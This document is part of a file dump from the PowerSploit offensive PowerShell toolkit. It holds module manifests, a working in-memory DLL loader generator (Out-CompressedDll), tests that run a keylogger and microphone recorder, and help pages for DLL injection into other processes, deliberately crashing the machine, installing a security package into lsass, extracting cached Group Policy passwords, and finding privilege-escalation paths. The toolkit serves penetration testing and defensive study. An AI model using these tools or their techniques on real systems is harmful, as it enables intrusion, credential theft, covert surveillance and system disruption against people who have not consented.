{6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Debug|Any CPU.ActiveCfg = Release|Any CPU 15 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Debug|Any CPU.Build.0 = Release|Any CPU 16 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Privesc/Privesc.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'Privesc.psm1' 5 | 6 | # Version number of this module. 
7 | ModuleVersion = '3.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56' 11 | 12 | # Author of this module 13 | Author = 'Will Schroeder (@harmj0y)' 14 | 15 | # Copyright statement for this module 16 | Copyright = 'BSD 3-Clause' 17 | 18 | # Description of the functionality provided by this module 19 | Description = 'PowerSploit Privesc Module' 20 | 21 | # Minimum version of the Windows PowerShell engine required by this module 22 | PowerShellVersion = '2.0' 23 | 24 | # Functions to export from this module 25 | FunctionsToExport = @( 26 | 'Get-ModifiablePath', 27 | 'Get-ProcessTokenGroup', 28 | 'Get-ProcessTokenPrivilege', 29 | 'Enable-Privilege', 30 | 'Add-ServiceDacl', 31 | 'Set-ServiceBinaryPath', 32 | 'Test-ServiceDaclPermission', 33 | 'Get-UnquotedService', 34 | 'Get-ModifiableServiceFile', 35 | 'Get-ModifiableService', 36 | 'Get-ServiceDetail', 37 | 'Invoke-ServiceAbuse', 38 | 'Write-ServiceBinary', 39 | 'Install-ServiceBinary', 40 | 'Restore-ServiceBinary', 41 | 'Find-ProcessDLLHijack', 42 | 'Find-PathDLLHijack', 43 | 'Write-HijackDll', 44 | 'Get-RegistryAlwaysInstallElevated', 45 | 'Get-RegistryAutoLogon', 46 | 'Get-ModifiableRegistryAutoRun', 47 | 'Get-ModifiableScheduledTaskFile', 48 | 'Get-UnattendedInstallFile', 49 | 'Get-WebConfig', 50 | 'Get-ApplicationHost', 51 | 'Get-SiteListPassword', 52 | 'Get-CachedGPPPassword', 53 | 'Write-UserAddMSI', 54 | 'Invoke-EventVwrBypass', 55 | 'Invoke-PrivescAudit', 56 | 'Get-System' 57 | ) 58 | 59 | # List of all files packaged with this module 60 | FileList = 'Privesc.psm1', 'Get-System.ps1', 'PowerUp.ps1', 'README.md' 61 | 62 | } 63 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Privesc/Privesc.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . 
$_.FullName} 2 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Recon/Dictionaries/generic.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/isaudits/scripts/9785abda7485c304c5ef452a8bf4068269d1d769/powershell/PowerSploit/Recon/Dictionaries/generic.txt -------------------------------------------------------------------------------- /powershell/PowerSploit/Recon/Recon.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} 2 | -------------------------------------------------------------------------------- /powershell/PowerSploit/ScriptModification/Out-CompressedDll.ps1: -------------------------------------------------------------------------------- 1 | function Out-CompressedDll 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. 7 | 8 | PowerSploit Function: Out-CompressedDll 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array. 17 | 18 | .PARAMETER FilePath 19 | 20 | Specifies the path to a managed executable. 21 | 22 | .EXAMPLE 23 | 24 | Out-CompressedDll -FilePath evil.dll 25 | 26 | Description 27 | ----------- 28 | Compresses, base64 encodes, and outputs the code required to load evil.dll in memory. 29 | 30 | .NOTES 31 | 32 | Only pure MSIL-based dlls can be loaded using this technique. Native or IJW ('it just works' - mixed-mode) dlls will not load. 
33 | 34 | .LINK 35 | 36 | http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html 37 | #> 38 | 39 | [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] 40 | [CmdletBinding()] 41 | Param ( 42 | [Parameter(Mandatory = $True)] 43 | [String] 44 | $FilePath 45 | ) 46 | 47 | $Path = Resolve-Path $FilePath 48 | 49 | if (! [IO.File]::Exists($Path)) 50 | { 51 | Throw "$Path does not exist." 52 | } 53 | 54 | $FileBytes = [System.IO.File]::ReadAllBytes($Path) 55 | 56 | if (($FileBytes[0..1] | ForEach-Object {[Char]$_}) -join '' -cne 'MZ') 57 | { 58 | Throw "$Path is not a valid executable." 59 | } 60 | 61 | $Length = $FileBytes.Length 62 | $CompressedStream = New-Object IO.MemoryStream 63 | $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress) 64 | $DeflateStream.Write($FileBytes, 0, $FileBytes.Length) 65 | $DeflateStream.Dispose() 66 | $CompressedFileBytes = $CompressedStream.ToArray() 67 | $CompressedStream.Dispose() 68 | $EncodedCompressedFile = [Convert]::ToBase64String($CompressedFileBytes) 69 | 70 | Write-Verbose "Compression ratio: $(($EncodedCompressedFile.Length/$FileBytes.Length).ToString('#%'))" 71 | 72 | $Output = @" 73 | `$EncodedCompressedFile = @' 74 | $EncodedCompressedFile 75 | '@ 76 | `$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`$EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress) 77 | `$UncompressedFileBytes = New-Object Byte[]($Length) 78 | `$DeflatedStream.Read(`$UncompressedFileBytes, 0, $Length) | Out-Null 79 | [Reflection.Assembly]::Load(`$UncompressedFileBytes) 80 | "@ 81 | 82 | Write-Output $Output 83 | } 84 | -------------------------------------------------------------------------------- /powershell/PowerSploit/ScriptModification/ScriptModification.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary 
module file associated with this manifest. 4 | ModuleToProcess = 'ScriptModification.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '3.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Copyright statement for this module 16 | Copyright = 'BSD 3-Clause' 17 | 18 | # Description of the functionality provided by this module 19 | Description = 'PowerSploit Script Preparation/Modification Module' 20 | 21 | # Minimum version of the Windows PowerShell engine required by this module 22 | PowerShellVersion = '2.0' 23 | 24 | # Functions to export from this module 25 | FunctionsToExport = '*' 26 | 27 | # List of all files packaged with this module 28 | FileList = 'ScriptModification.psm1', 'ScriptModification.psd1', 'Out-CompressedDll.ps1', 'Out-EncodedCommand.ps1', 29 | 'Out-EncryptedScript.ps1', 'Remove-Comment.ps1', 'Usage.md' 30 | 31 | } 32 | -------------------------------------------------------------------------------- /powershell/PowerSploit/ScriptModification/ScriptModification.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} 2 | -------------------------------------------------------------------------------- /powershell/PowerSploit/ScriptModification/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 
2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module ScriptModification` 7 | 8 | To see the commands imported, type `Get-Command -Module ScriptModification` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /powershell/PowerSploit/Tests/Exfiltration.tests.ps1: -------------------------------------------------------------------------------- 1 | Set-StrictMode -Version Latest 2 | 3 | $TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent 4 | $ModuleRoot = Resolve-Path "$TestScriptRoot\.." 5 | $ModuleManifest = "$ModuleRoot\Exfiltration\Exfiltration.psd1" 6 | 7 | Remove-Module [E]xfiltration 8 | Import-Module $ModuleManifest -Force -ErrorAction Stop 9 | 10 | Describe 'Get-Keystrokes' { 11 | 12 | if (Test-Path "$($env:TEMP)\key.log") { Remove-Item -Force "$($env:TEMP)\key.log" } 13 | $WindowTitle = (Get-Process -Id $PID).MainWindowTitle 14 | 15 | $Shell = New-Object -ComObject wscript.shell 16 | $Shell.AppActivate($WindowTitle) 17 | 18 | $KeyLogger = Get-Keystrokes -PassThru 19 | Start-Sleep -Seconds 1 20 | 21 | $Shell.SendKeys("Pester`b`b`b`b`b`b") 22 | $KeyLogger.Dispose() 23 | 24 | It 'Should output to file' { Test-Path "$($env:TEMP)\key.log" | Should Be $true } 25 | 26 | $KeyObjects = Get-Content -Path "$($env:TEMP)\key.log" | ConvertFrom-Csv 27 | 28 | It 'Should log keystrokes' { 29 | $FileLength = (Get-Item "$($env:TEMP)\key.log").Length 30 | $FileLength | Should BeGreaterThan 14 31 | } 32 | 33 | It 'Should get foreground window title' { 34 | 
$KeyObjects[0].WindowTitle | Should Be $WindowTitle 35 | } 36 | 37 | <# NOTE(review): [DateTime]::Parse either throws or returns a DateTime, so the type assertion is tautological; this It effectively only checks that the Time column parses. #> It 'Should log time of key press' { 38 | $KeyTime = [DateTime]::Parse($KeyObjects[0].Time) 39 | $KeyTime.GetType().Name | Should Be 'DateTime' 40 | } 41 | 42 | <# Starts a second logger with -Timeout 0.05 (units as defined by Get-Keystrokes, not visible here), waits 4 s, then expects its runspace to be back to 'Available'. #> It 'Should stop logging after timeout' { 43 | 44 | $Timeout = 0.05 45 | $KeyLogger = Get-Keystrokes -Timeout $Timeout -PassThru 46 | 47 | Start-Sleep -Seconds 4 48 | 49 | $KeyLogger.Runspace.RunspaceAvailability | Should Be 'Available' 50 | $KeyLogger.Dispose() 51 | } 52 | 53 | Remove-Item -Force "$($env:TEMP)\key.log" 54 | } 55 | 56 | <# Records microphone audio to a file under $env:TEMP with -Length $RecordLen (2; units per Get-MicrophoneAudio, not visible here); BeforeEach/AfterEach delete the file so each It starts clean. #> Describe "Get-MicrophoneAudio" { 57 | 58 | $RecordPath = "$env:TEMP\test_record.wav" 59 | $RecordLen = 2 60 | Context 'Successful Recording' { 61 | BeforeEach { 62 | #Ensure the recording has been removed prior to testing 63 | Remove-Item -Path $RecordPath -ErrorAction SilentlyContinue 64 | } 65 | 66 | AfterEach { 67 | #Remove the recording after testing 68 | Remove-Item -Path $RecordPath -ErrorAction SilentlyContinue 69 | } 70 | 71 | It 'should record audio from the microphone and save it to a specified path' { 72 | $result = Get-MicrophoneAudio -Path $RecordPath -Length $RecordLen 73 | $result | Should Not BeNullOrEmpty 74 | $result.Length | Should BeGreaterThan 0 75 | } 76 | 77 | } 78 | 79 | Context 'Invalid Arguments' { 80 | <# NOTE(review): -Length RecordLen is a bare word (the variable is $RecordLen, line 59), so the call can throw on the malformed Length argument rather than on the fake path; Should Throw cannot tell the two apart. Suggest -Length $RecordLen so the assertion exercises the path check. #> It 'should not allow invalid paths to be used' { 81 | { Get-MicrophoneAudio -Path "c:\FAKEPATH\yay.wav" -Length RecordLen} | Should Throw 82 | } 83 | } 84 | 85 | } 86 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Tests/PowerSploit.tests.ps1: -------------------------------------------------------------------------------- 1 | Set-StrictMode -Version Latest 2 | 3 | $TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent 4 | $ModuleRoot = Resolve-Path "$TestScriptRoot\.." 
5 | 6 | <# Pipeline filter: reads the first bytes of each file path (or FileInfo via the FullName alias) and throws when they match the 16-bit marker below. Directories, missing files and files shorter than 3 bytes are skipped with only a Write-Debug message. #> filter Assert-NotLittleEndianUnicode { 7 | [CmdletBinding()] 8 | param ( 9 | [Parameter(Mandatory = $True, 10 | ValueFromPipelineByPropertyName = $True, 11 | ValueFromPipeline = $True)] 12 | [Alias('FullName')] 13 | [String[]] 14 | $FilePath 15 | ) 16 | 17 | <# NOTE(review): 0xBBEF read as a little-endian UInt16 is the byte pair EF BB, i.e. the start of the UTF-8 BOM (EF BB BF); the UTF-16LE BOM is FF FE (0xFEFF). Confirm which encoding this check is meant to reject — the filter name and messages say UTF-16LE. #> $LittleEndianMarker = 48111 # 0xBBEF 18 | 19 | Write-Verbose "Current file: $FilePath" 20 | Write-Debug "Current file: $FilePath" 21 | 22 | if ([System.IO.Directory]::Exists($FilePath)) { 23 | Write-Debug "File is a directory." 24 | return 25 | } 26 | 27 | if (-not [System.IO.File]::Exists($FilePath)) { 28 | Write-Debug "File does not exist." 29 | return 30 | } 31 | 32 | <# -Encoding Byte is Windows PowerShell (5.1) syntax; PowerShell 6+ replaced it with -AsByteStream. #> $FileBytes = Get-Content -TotalCount 3 -Encoding Byte -Path $FilePath 33 | 34 | <# Requires at least 3 bytes (TotalCount 3 above) although the message says 2. #> if ($FileBytes.Length -le 2) { 35 | Write-Debug "File must be at least 2 bytes in length." 36 | return 37 | } 38 | 39 | if ([BitConverter]::ToUInt16($FileBytes, 0) -eq $LittleEndianMarker) { 40 | Write-Debug "File contains little endian unicode marker." 41 | <# $_ is the current pipeline object (the FileInfo when fed from Get-ChildItem), not $FilePath. #> throw "$_ is little-endian unicode encoded." 42 | } 43 | } 44 | 45 | <# Walks every .ps1/.psd1/.psm1 under the module root through the filter; any throw fails the single It. #> Describe 'ASCII encoding of all scripts' { 46 | It 'should not contain little-endian unicode encoded scripts or modules' { 47 | { Get-ChildItem -Path $ModuleRoot -Recurse -Include *.ps1,*.psd1,*.psm1 | Assert-NotLittleEndianUnicode } | Should Not Throw 48 | } 49 | } -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/CodeExecution/Invoke-DllInjection.md: -------------------------------------------------------------------------------- 1 | # Invoke-DllInjection 2 | 3 | ## SYNOPSIS 4 | Injects a Dll into the process ID of your choosing. 
5 | 6 | PowerSploit Function: Invoke-DllInjection 7 | Author: Matthew Graeber (@mattifestation) 8 | License: BSD 3-Clause 9 | Required Dependencies: None 10 | Optional Dependencies: None 11 | 12 | ## SYNTAX 13 | 14 | ``` 15 | Invoke-DllInjection [-ProcessID] [-Dll] 16 | ``` 17 | 18 | ## DESCRIPTION 19 | Invoke-DllInjection injects a Dll into an arbitrary process. 20 | It does this by using VirtualAllocEx to allocate memory the size of the 21 | DLL in the remote process, writing the names of the DLL to load into the 22 | remote process spacing using WriteProcessMemory, and then using RtlCreateUserThread 23 | to invoke LoadLibraryA in the context of the remote process. 24 | 25 | ## EXAMPLES 26 | 27 | ### -------------------------- EXAMPLE 1 -------------------------- 28 | ``` 29 | Invoke-DllInjection -ProcessID 4274 -Dll evil.dll 30 | ``` 31 | 32 | Description 33 | ----------- 34 | Inject 'evil.dll' into process ID 4274. 35 | 36 | ## PARAMETERS 37 | 38 | ### -ProcessID 39 | Process ID of the process you want to inject a Dll into. 40 | 41 | ```yaml 42 | Type: Int32 43 | Parameter Sets: (All) 44 | Aliases: 45 | 46 | Required: True 47 | Position: 1 48 | Default value: 0 49 | Accept pipeline input: False 50 | Accept wildcard characters: False 51 | ``` 52 | 53 | ### -Dll 54 | Name of the dll to inject. 55 | This can be an absolute or relative path. 56 | 57 | ```yaml 58 | Type: String 59 | Parameter Sets: (All) 60 | Aliases: 61 | 62 | Required: True 63 | Position: 2 64 | Default value: None 65 | Accept pipeline input: False 66 | Accept wildcard characters: False 67 | ``` 68 | 69 | ## INPUTS 70 | 71 | ## OUTPUTS 72 | 73 | ## NOTES 74 | Use the '-Verbose' option to print detailed information. 
75 | 76 | ## RELATED LINKS 77 | 78 | [http://www.exploit-monday.com](http://www.exploit-monday.com) 79 | 80 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Mayhem/Set-CriticalProcess.md: -------------------------------------------------------------------------------- 1 | # Set-CriticalProcess 2 | 3 | ## SYNOPSIS 4 | Causes your machine to blue screen upon exiting PowerShell. 5 | 6 | PowerSploit Function: Set-CriticalProcess 7 | Author: Matthew Graeber (@mattifestation) 8 | License: BSD 3-Clause 9 | Required Dependencies: None 10 | Optional Dependencies: None 11 | 12 | ## SYNTAX 13 | 14 | ``` 15 | Set-CriticalProcess [-Force] [-ExitImmediately] [-WhatIf] [-Confirm] 16 | ``` 17 | 18 | ## DESCRIPTION 19 | {{Fill in the Description}} 20 | 21 | ## EXAMPLES 22 | 23 | ### -------------------------- EXAMPLE 1 -------------------------- 24 | ``` 25 | Set-CriticalProcess 26 | ``` 27 | 28 | ### -------------------------- EXAMPLE 2 -------------------------- 29 | ``` 30 | Set-CriticalProcess -ExitImmediately 31 | ``` 32 | 33 | ### -------------------------- EXAMPLE 3 -------------------------- 34 | ``` 35 | Set-CriticalProcess -Force -Verbose 36 | ``` 37 | 38 | ## PARAMETERS 39 | 40 | ### -Force 41 | Set the running PowerShell process as critical without asking for confirmation. 42 | 43 | ```yaml 44 | Type: SwitchParameter 45 | Parameter Sets: (All) 46 | Aliases: 47 | 48 | Required: False 49 | Position: Named 50 | Default value: False 51 | Accept pipeline input: False 52 | Accept wildcard characters: False 53 | ``` 54 | 55 | ### -ExitImmediately 56 | Immediately exit PowerShell after successfully marking the process as critical. 
57 | 58 | ```yaml 59 | Type: SwitchParameter 60 | Parameter Sets: (All) 61 | Aliases: 62 | 63 | Required: False 64 | Position: Named 65 | Default value: False 66 | Accept pipeline input: False 67 | Accept wildcard characters: False 68 | ``` 69 | 70 | ### -WhatIf 71 | Shows what would happen if the cmdlet runs. 72 | The cmdlet is not run. 73 | 74 | ```yaml 75 | Type: SwitchParameter 76 | Parameter Sets: (All) 77 | Aliases: wi 78 | 79 | Required: False 80 | Position: Named 81 | Default value: None 82 | Accept pipeline input: False 83 | Accept wildcard characters: False 84 | ``` 85 | 86 | ### -Confirm 87 | Prompts you for confirmation before running the cmdlet. 88 | 89 | ```yaml 90 | Type: SwitchParameter 91 | Parameter Sets: (All) 92 | Aliases: cf 93 | 94 | Required: False 95 | Position: Named 96 | Default value: None 97 | Accept pipeline input: False 98 | Accept wildcard characters: False 99 | ``` 100 | 101 | ## INPUTS 102 | 103 | ## OUTPUTS 104 | 105 | ## NOTES 106 | 107 | ## RELATED LINKS 108 | 109 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Persistence/Get-SecurityPackage.md: -------------------------------------------------------------------------------- 1 | # Get-SecurityPackage 2 | 3 | ## SYNOPSIS 4 | Enumerates all loaded security packages (SSPs). 5 | 6 | Author: Matthew Graeber (@mattifestation) 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | Optional Dependencies: None 10 | 11 | ## SYNTAX 12 | 13 | ``` 14 | Get-SecurityPackage 15 | ``` 16 | 17 | ## DESCRIPTION 18 | Get-SecurityPackage is a wrapper for secur32!EnumerateSecurityPackages. 19 | It also parses the returned SecPkgInfo struct array. 
20 | 21 | ## EXAMPLES 22 | 23 | ### -------------------------- EXAMPLE 1 -------------------------- 24 | ``` 25 | Get-SecurityPackage 26 | ``` 27 | 28 | ## PARAMETERS 29 | 30 | ## INPUTS 31 | 32 | ## OUTPUTS 33 | 34 | ## NOTES 35 | 36 | ## RELATED LINKS 37 | 38 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Persistence/Install-SSP.md: -------------------------------------------------------------------------------- 1 | # Install-SSP 2 | 3 | ## SYNOPSIS 4 | Installs a security support provider (SSP) dll. 5 | 6 | Author: Matthew Graeber (@mattifestation) 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | Optional Dependencies: None 10 | 11 | ## SYNTAX 12 | 13 | ``` 14 | Install-SSP [[-Path] ] 15 | ``` 16 | 17 | ## DESCRIPTION 18 | Install-SSP installs an SSP dll. 19 | Installation involves copying the dll to 20 | %windir%\System32 and adding the name of the dll to 21 | HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages. 22 | 23 | ## EXAMPLES 24 | 25 | ### -------------------------- EXAMPLE 1 -------------------------- 26 | ``` 27 | Install-SSP -Path .\mimilib.dll 28 | ``` 29 | 30 | ## PARAMETERS 31 | 32 | ### -Path 33 | {{Fill Path Description}} 34 | 35 | ```yaml 36 | Type: String 37 | Parameter Sets: (All) 38 | Aliases: 39 | 40 | Required: False 41 | Position: 1 42 | Default value: None 43 | Accept pipeline input: False 44 | Accept wildcard characters: False 45 | ``` 46 | 47 | ## INPUTS 48 | 49 | ## OUTPUTS 50 | 51 | ## NOTES 52 | The SSP dll must match the OS architecture. 53 | i.e. 54 | You must have a 64-bit SSP dll 55 | if you are running a 64-bit OS. 56 | In order for the SSP dll to be loaded properly 57 | into lsass, the dll must export SpLsaModeInitialize. 
58 | 59 | ## RELATED LINKS 60 | 61 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Add-ServiceDacl.md: -------------------------------------------------------------------------------- 1 | # Add-ServiceDacl 2 | 3 | ## SYNOPSIS 4 | Adds a Dacl field to a service object returned by Get-Service. 5 | 6 | Author: Matthew Graeber (@mattifestation) 7 | License: BSD 3-Clause 8 | Required Dependencies: PSReflect 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Add-ServiceDacl [-Name] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a 18 | Dacl field to each object. 19 | It does this by opening a handle with ReadControl for the 20 | service with using the GetServiceHandle Win32 API call and then uses 21 | QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service. 22 | 23 | ## EXAMPLES 24 | 25 | ### -------------------------- EXAMPLE 1 -------------------------- 26 | ``` 27 | Get-Service | Add-ServiceDacl 28 | ``` 29 | 30 | Add Dacls for every service the current user can read. 31 | 32 | ### -------------------------- EXAMPLE 2 -------------------------- 33 | ``` 34 | Get-Service -Name VMTools | Add-ServiceDacl 35 | ``` 36 | 37 | Add the Dacl to the VMTools service object. 38 | 39 | ## PARAMETERS 40 | 41 | ### -Name 42 | An array of one or more service names to add a service Dacl for. 43 | Passable on the pipeline. 
44 | 45 | ```yaml 46 | Type: String[] 47 | Parameter Sets: (All) 48 | Aliases: ServiceName 49 | 50 | Required: True 51 | Position: 1 52 | Default value: None 53 | Accept pipeline input: True (ByPropertyName, ByValue) 54 | Accept wildcard characters: False 55 | ``` 56 | 57 | ## INPUTS 58 | 59 | ## OUTPUTS 60 | 61 | ### ServiceProcess.ServiceController 62 | 63 | ## NOTES 64 | 65 | ## RELATED LINKS 66 | 67 | [https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/) 68 | 69 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Find-PathDLLHijack.md: -------------------------------------------------------------------------------- 1 | # Find-PathDLLHijack 2 | 3 | ## SYNOPSIS 4 | Finds all directories in the system %PATH% that are modifiable by the current user. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: Get-ModifiablePath 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Find-PathDLLHijack 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Enumerates the paths stored in Env:Path (%PATH) and filters each through Get-ModifiablePath 18 | to return the folder paths the current user can write to. 19 | On Windows 7, if wlbsctrl.dll is 20 | written to one of these paths, execution for the IKEEXT can be hijacked due to DLL search 21 | order loading. 22 | 23 | ## EXAMPLES 24 | 25 | ### -------------------------- EXAMPLE 1 -------------------------- 26 | ``` 27 | Find-PathDLLHijack 28 | ``` 29 | 30 | Finds all %PATH% .DLL hijacking opportunities. 
31 | 32 | ## PARAMETERS 33 | 34 | ## INPUTS 35 | 36 | ## OUTPUTS 37 | 38 | ### PowerUp.HijackableDLL.Path 39 | 40 | ## NOTES 41 | 42 | ## RELATED LINKS 43 | 44 | [http://www.greyhathacker.net/?p=738](http://www.greyhathacker.net/?p=738) 45 | 46 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Get-CachedGPPPassword.md: -------------------------------------------------------------------------------- 1 | # Get-CachedGPPPassword 2 | 3 | ## SYNOPSIS 4 | Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences and 5 | left in cached files on the host. 6 | 7 | Author: Chris Campbell (@obscuresec) 8 | License: BSD 3-Clause 9 | Required Dependencies: None 10 | 11 | ## SYNTAX 12 | 13 | ``` 14 | Get-CachedGPPPassword 15 | ``` 16 | 17 | ## DESCRIPTION 18 | Get-CachedGPPPassword searches the local machine for cached for groups.xml, scheduledtasks.xml, services.xml and 19 | datasources.xml files and returns plaintext passwords. 
20 | 21 | ## EXAMPLES 22 | 23 | ### -------------------------- EXAMPLE 1 -------------------------- 24 | ``` 25 | Get-CachedGPPPassword 26 | ``` 27 | 28 | NewName : \[BLANK\] 29 | Changed : {2013-04-25 18:36:07} 30 | Passwords : {Super!!!Password} 31 | UserNames : {SuperSecretBackdoor} 32 | File : C:\ProgramData\Microsoft\Group Policy\History\{32C4C89F-7 33 | C3A-4227-A61D-8EF72B5B9E42}\Machine\Preferences\Groups\Gr 34 | oups.xml 35 | 36 | ## PARAMETERS 37 | 38 | ## INPUTS 39 | 40 | ## OUTPUTS 41 | 42 | ## NOTES 43 | 44 | ## RELATED LINKS 45 | 46 | [http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html](http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html) 47 | [https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1](https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1) 48 | [https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb) 49 | [http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences](http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences) 50 | [http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html](http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html) 51 | 52 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Get-ModifiableRegistryAutoRun.md: -------------------------------------------------------------------------------- 1 | # Get-ModifiableRegistryAutoRun 2 | 3 | ## SYNOPSIS 4 | Returns any elevated system autoruns in which the current user can 5 | modify part of the path string. 
6 | 7 | Author: Will Schroeder (@harmj0y) 8 | License: BSD 3-Clause 9 | Required Dependencies: Get-ModifiablePath 10 | 11 | ## SYNTAX 12 | 13 | ``` 14 | Get-ModifiableRegistryAutoRun 15 | ``` 16 | 17 | ## DESCRIPTION 18 | Enumerates a number of autorun specifications in HKLM and filters any 19 | autoruns through Get-ModifiablePath, returning any file/config locations 20 | in the found path strings that the current user can modify. 21 | 22 | ## EXAMPLES 23 | 24 | ### -------------------------- EXAMPLE 1 -------------------------- 25 | ``` 26 | Get-ModifiableRegistryAutoRun 27 | ``` 28 | 29 | Return vulnerable autorun binaries (or associated configs). 30 | 31 | ## PARAMETERS 32 | 33 | ## INPUTS 34 | 35 | ## OUTPUTS 36 | 37 | ### PowerUp.ModifiableRegistryAutoRun 38 | 39 | Custom PSObject containing results. 40 | 41 | ## NOTES 42 | 43 | ## RELATED LINKS 44 | 45 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Get-ModifiableScheduledTaskFile.md: -------------------------------------------------------------------------------- 1 | # Get-ModifiableScheduledTaskFile 2 | 3 | ## SYNOPSIS 4 | Returns scheduled tasks where the current user can modify any file 5 | in the associated task action string. 6 | 7 | Author: Will Schroeder (@harmj0y) 8 | License: BSD 3-Clause 9 | Required Dependencies: Get-ModifiablePath 10 | 11 | ## SYNTAX 12 | 13 | ``` 14 | Get-ModifiableScheduledTaskFile 15 | ``` 16 | 17 | ## DESCRIPTION 18 | Enumerates all scheduled tasks by recursively listing "$($ENV:windir)\System32\Tasks" 19 | and parses the XML specification for each task, extracting the command triggers. 20 | Each trigger string is filtered through Get-ModifiablePath, returning any file/config 21 | locations in the found path strings that the current user can modify. 
22 | 23 | ## EXAMPLES 24 | 25 | ### -------------------------- EXAMPLE 1 -------------------------- 26 | ``` 27 | Get-ModifiableScheduledTaskFile 28 | ``` 29 | 30 | Return scheduled tasks with modifiable command strings. 31 | 32 | ## PARAMETERS 33 | 34 | ## INPUTS 35 | 36 | ## OUTPUTS 37 | 38 | ### PowerUp.ModifiableScheduledTaskFile 39 | 40 | Custom PSObject containing results. 41 | 42 | ## NOTES 43 | 44 | ## RELATED LINKS 45 | 46 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Get-ModifiableService.md: -------------------------------------------------------------------------------- 1 | # Get-ModifiableService 2 | 3 | ## SYNOPSIS 4 | Enumerates all services and returns services for which the current user can modify the binPath. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: Test-ServiceDaclPermission, Get-ServiceDetail 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-ModifiableService 14 | 